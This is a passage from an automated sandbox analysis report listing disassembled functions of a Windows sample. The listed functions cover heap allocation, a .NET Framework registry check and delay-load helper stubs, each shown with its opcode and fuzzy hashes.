Opcode ID: e94bb27b1f660b7374724e139a06f5402048c5b5148fa4f65cda7ee412af8985
Instruction ID: a4ab65bcfb8e65195505a8909a891899378347add6b3960216cc6a6a92841da7
Opcode Fuzzy Hash: e94bb27b1f660b7374724e139a06f5402048c5b5148fa4f65cda7ee412af8985
Instruction Fuzzy Hash: 22116D71E012069FCB20DFE8C4959AFBB75AF85711B5482A8E906EB341CB30DE05CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00D5692F Relevance: 1.6, APIs: 1, Instructions: 53
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00D5479B: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00D53374,00000001,00000364,00000006,000000FF,?,00D511CD,?,00000004,00000000,?,?), ref: 00D547DC

_free.LIBCMT ref: 00D5699E

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 4a468a5df08eb0c39ee0081248d001202a8e28e517d3b868daca96c5385feade
Instruction ID: edc2db71c440ec0b1e4d34cc069d6970114ace978605a71f25e66d47fb9cd952
Opcode Fuzzy Hash: 4a468a5df08eb0c39ee0081248d001202a8e28e517d3b868daca96c5385feade
Instruction Fuzzy Hash: A3012B726043166BC7308F59C885999FB98FB053B1F550269ED59A7680E770AC18CFB4

Uniqueness

Uniqueness Score: -1.00%

Function 00D41DFF Relevance: 1.6, APIs: 1, Instructions: 51
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(00000000,00020019,00000000,?,00000000,?,?,?,?,?,00D41195,80000002,SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full,00020019), ref: 00D41E41

Part of subcall function 00D41D9C: GetModuleHandleW.KERNEL32(Advapi32.dll,?,?,?,00D41E33,00000000,00020019,?,?,00000000,?,?,?,?,?,00D41195), ref: 00D41DAE
Part of subcall function 00D41D9C: GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 00D41DBE

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID: AddressHandleModuleOpenProc
String ID:
API String ID: 1337834000-0
Opcode ID: adf8cbd6d15d8167975753c25a89e3b17e0c3fceb22f31a82cee778a1b150776
Instruction ID: 9082815c911dcf5cff4fea1059908abdff373c83dddcf748d938fcc7abc146bf
Opcode Fuzzy Hash: adf8cbd6d15d8167975753c25a89e3b17e0c3fceb22f31a82cee778a1b150776
Instruction Fuzzy Hash: 5B01E979A11219ABDF08DF99C855AAFBBA8EF49714F04816DB805E7240DA74AD408BB0

Uniqueness

Uniqueness Score: -1.00%

Function 00D5479B Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00D53374,00000001,00000364,00000006,000000FF,?,00D511CD,?,00000004,00000000,?,?), ref: 00D547DC

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 49b627f5e7643aec1e90cf256e55d3a92c77bacb35567e0eb67ddc289418dc4a
Instruction ID: 7d8202906d91c6f4066be9f388ee9f351990287d543d11bf95a80d38439e0a76
Opcode Fuzzy Hash: 49b627f5e7643aec1e90cf256e55d3a92c77bacb35567e0eb67ddc289418dc4a
Instruction Fuzzy Hash: 77F0B43124062467AF211A229C01B5B37C8EF5B7B7B1A4112EC18D7180DB20DC9882F2

Uniqueness

Uniqueness Score: -1.00%

Function 00D49CD1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D49C96

Part of subcall function 00D4A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00D4A09B
Part of subcall function 00D4A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D4A103
Part of subcall function 00D4A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D4A114

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 24875fd445eab8fcd97d1bbc40447c07d02fd401919929f496c14e4f6db172bc
Instruction ID: 5d02e6df6ccffc60ae6841c4c8e187d57fda89b5c7369a9d8afad018e58adf4f
Opcode Fuzzy Hash: 24875fd445eab8fcd97d1bbc40447c07d02fd401919929f496c14e4f6db172bc
Instruction Fuzzy Hash: 35B012D539C100AF3114E11D5E06D37025CD4C0B12330452AF0C0C5144D8804C451033

Uniqueness

Uniqueness Score: -1.00%

Function 00D49CDB Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D49C96

Part of subcall function 00D4A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00D4A09B
Part of subcall function 00D4A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D4A103
Part of subcall function 00D4A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D4A114

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 63a5be2886ff0e8100e44a0f7d2c756a6113e1a77acfa163f879b2bf84f33b79
Instruction ID: 71a62b30a17b6bda80c3c5b3f85e995c2bdded212448cc342acf2531758d86e7
Opcode Fuzzy Hash: 63a5be2886ff0e8100e44a0f7d2c756a6113e1a77acfa163f879b2bf84f33b79
Instruction Fuzzy Hash: FAB0129539C100AF3114E11D1C06D37025CD5C0B12330492AF0C0C5184D8804C541033

Uniqueness

Uniqueness Score: -1.00%

Function 00D49CC7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D49C96

Part of subcall function 00D4A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00D4A09B
Part of subcall function 00D4A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D4A103
Part of subcall function 00D4A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D4A114

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 71df3f1ff095dfdd825e39be671fa88fe5a904de2a98f48ddaa376eac56bb126
Instruction ID: 54f71081c5b35bef5456658da40c1361315755aee8655f22767d974e80431fdc
Opcode Fuzzy Hash: 71df3f1ff095dfdd825e39be671fa88fe5a904de2a98f48ddaa376eac56bb126
Instruction Fuzzy Hash: A0B0129539C200AF3114E11D1C06D37025CC4C0B12330462AF0C0C5144D8804C841133

Uniqueness

Uniqueness Score: -1.00%

Function 00D49CE5 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D49C96

Part of subcall function 00D4A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00D4A09B
Part of subcall function 00D4A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D4A103
Part of subcall function 00D4A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D4A114

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: dc2c92b29e23d53f9eba070c7342781c5e9d5d9a6a2bd106ff259ac2f7781603
Instruction ID: 11274dcc9d25597e74822d565c2303f56dea17f254478af5313dbf76c5d5661c
Opcode Fuzzy Hash: dc2c92b29e23d53f9eba070c7342781c5e9d5d9a6a2bd106ff259ac2f7781603
Instruction Fuzzy Hash: 29B0129529C100AF3104E11D1C06D37037CC4C0B12330892AF4C0C5144D8805C042033

Uniqueness

Uniqueness Score: -1.00%

Function 00D49C9F Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D49C96

Part of subcall function 00D4A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00D4A09B
Part of subcall function 00D4A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D4A103
Part of subcall function 00D4A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D4A114

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: e8709342b0efb21f8b7c8ae814d8909d7b894eb47ce631d882092d1a8f081f1c
Instruction ID: 24dc9d9e48d1792f979147cdb2a02b84ad537590bc17592d57c493196772c77f
Opcode Fuzzy Hash: e8709342b0efb21f8b7c8ae814d8909d7b894eb47ce631d882092d1a8f081f1c
Instruction Fuzzy Hash: 97B012A529C100AF3104E11D1E06D3702DCD4C0B12330492AF0C0C5144D8804C051033

Uniqueness

Uniqueness Score: -1.00%

Function 00D49C84 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D49C96

Part of subcall function 00D4A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00D4A09B
Part of subcall function 00D4A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D4A103
Part of subcall function 00D4A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D4A114

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: f426a14e9af3fb5736d364e0d30ef1141cf589af2575cb4be4554e36cf71a1eb
Instruction ID: 87645473b4ddfce34440f901ffcc04402eba2d19e765eea864075a035dd1d3d9
Opcode Fuzzy Hash: f426a14e9af3fb5736d364e0d30ef1141cf589af2575cb4be4554e36cf71a1eb
Instruction Fuzzy Hash: C6B0129539C104BF3114A2191E06C37021DC4C0B123308A3AF4C0D4044D8805C441033

Uniqueness

Uniqueness Score: -1.00%

Function 00D49CB3 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D49C96

Part of subcall function 00D4A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00D4A09B
Part of subcall function 00D4A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D4A103
Part of subcall function 00D4A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D4A114

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 9c713185164ea9c9d23a391340fdde6dcf3540a1481cfc90341edc9cc48b94d5
Instruction ID: 2eb03f26191e76639f5a22047b4e3523ce708e9bf90cbee650587a00bf913c3f
Opcode Fuzzy Hash: 9c713185164ea9c9d23a391340fdde6dcf3540a1481cfc90341edc9cc48b94d5
Instruction Fuzzy Hash: 04B0129529C100AF3104E12D1C06D37029CC5C0B123308D2AF4C0C5144D8809C041033

Uniqueness

Uniqueness Score: -1.00%

Function 00D49CBD Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D49C96

Part of subcall function 00D4A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00D4A09B
Part of subcall function 00D4A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D4A103
Part of subcall function 00D4A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D4A114

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 5dbcd6de2826d605799b14e07871af1912905fbe75eddddce5fdeaa85f7cc0f0
Instruction ID: 7ff753d7899c5c649237d6486309f2f1237544aeb8763a7596e17cbfb272b6b6
Opcode Fuzzy Hash: 5dbcd6de2826d605799b14e07871af1912905fbe75eddddce5fdeaa85f7cc0f0
Instruction Fuzzy Hash: D5B0129629C100AF3104E11D1C16D37029CD5C0B12330492BF0C0C5144D8804C041033

Uniqueness

Uniqueness Score: -1.00%

Function 00D49CA9 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D49C96

Part of subcall function 00D4A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00D4A09B
Part of subcall function 00D4A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D4A103
Part of subcall function 00D4A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D4A114

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 042d3f5a514a41e11ef5d05b51db2fc45bef9114f096e8b6cdbd54ca3cafdcb5
Instruction ID: d7d5e9a75b3a1c221290933e4bfd9137a97e0e33df1bbba058f26d7571e3b823
Opcode Fuzzy Hash: 042d3f5a514a41e11ef5d05b51db2fc45bef9114f096e8b6cdbd54ca3cafdcb5
Instruction Fuzzy Hash: 54B0129529C200AF3104E11D1C06D37029CC4C0B123304A2AF0C0C5144D8804C441133

Uniqueness

Uniqueness Score: -1.00%

Function 00D49D50 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D49D62

Part of subcall function 00D4A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00D4A09B
Part of subcall function 00D4A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D4A103
Part of subcall function 00D4A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D4A114

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 5fe85569bc521685a3a17a081d5e75dd4c8d212891bbb6f1483f15e01cbb775d
Instruction ID: aabf4983095386b667053053a352f2e93ba4557be2fece74b80d71ea81b2955c
Opcode Fuzzy Hash: 5fe85569bc521685a3a17a081d5e75dd4c8d212891bbb6f1483f15e01cbb775d
Instruction Fuzzy Hash: A7B0128529D2007F310451192D02C37030CD5D0B31330471AF041D8044D8C04C442233

Uniqueness

Uniqueness Score: -1.00%

Function 00D49D6B Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D49D62

Part of subcall function 00D4A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00D4A09B
Part of subcall function 00D4A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D4A103
Part of subcall function 00D4A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D4A114

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: c29615cb2ac366af5dba4137ba316166df9b8fb8bd1ed8fae16d37206b651dca
Instruction ID: d58c88a08c138633cc0cf86a81d727e9831f958db6606b10ef117a7b488e306f
Opcode Fuzzy Hash: c29615cb2ac366af5dba4137ba316166df9b8fb8bd1ed8fae16d37206b651dca
Instruction Fuzzy Hash: A6B0128529E1006F3104911D2D02D37030CD6C0B30330451AF044C8144D8C04C042233

Uniqueness

Uniqueness Score: -1.00%

Function 00D49D03 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D49C96

Part of subcall function 00D4A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00D4A09B
Part of subcall function 00D4A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D4A103
Part of subcall function 00D4A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D4A114

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: e4313692119673936b3c1935e1b01c335eb61694e41213c6c82ce2f74943cb83
Instruction ID: fa97e64d440770511c88dc306b87cc9ec10e16660510d2398270043debeb870f
Opcode Fuzzy Hash: e4313692119673936b3c1935e1b01c335eb61694e41213c6c82ce2f74943cb83
Instruction Fuzzy Hash: 8BB0129129C200AF3104E15E1C06E37035DD4C0B12330462AF0C0C1144D8804C841033

Uniqueness

Uniqueness Score: -1.00%

Function 00D49CF4 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D49C96

Part of subcall function 00D4A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00D4A09B
Part of subcall function 00D4A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D4A103
Part of subcall function 00D4A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D4A114

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 686593a73f6e9b44a53af79d39259845b80448c342cadb6435464208ea268ce7
Instruction ID: aeebc2f721d351f78370777f08c247852b8fa6a822691f7e649dae92b4a73399
Opcode Fuzzy Hash: 686593a73f6e9b44a53af79d39259845b80448c342cadb6435464208ea268ce7
Instruction Fuzzy Hash: 74A001A62AD202BE3519A6666D5AD3B426DD8C4B623308A2AF48285089A88058592036

Uniqueness

Uniqueness Score: -1.00%

Function 00D49CFE Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D49C96

Part of subcall function 00D4A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00D4A09B
Part of subcall function 00D4A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D4A103
Part of subcall function 00D4A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D4A114

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 6e5d56dc7e0d27eb1263fb4c291ddfcc5332e33f7069b2b20e8b04ed95fcd843
Instruction ID: aeebc2f721d351f78370777f08c247852b8fa6a822691f7e649dae92b4a73399
Opcode Fuzzy Hash: 6e5d56dc7e0d27eb1263fb4c291ddfcc5332e33f7069b2b20e8b04ed95fcd843
Instruction Fuzzy Hash: 74A001A62AD202BE3519A6666D5AD3B426DD8C4B623308A2AF48285089A88058592036

Uniqueness

Uniqueness Score: -1.00%

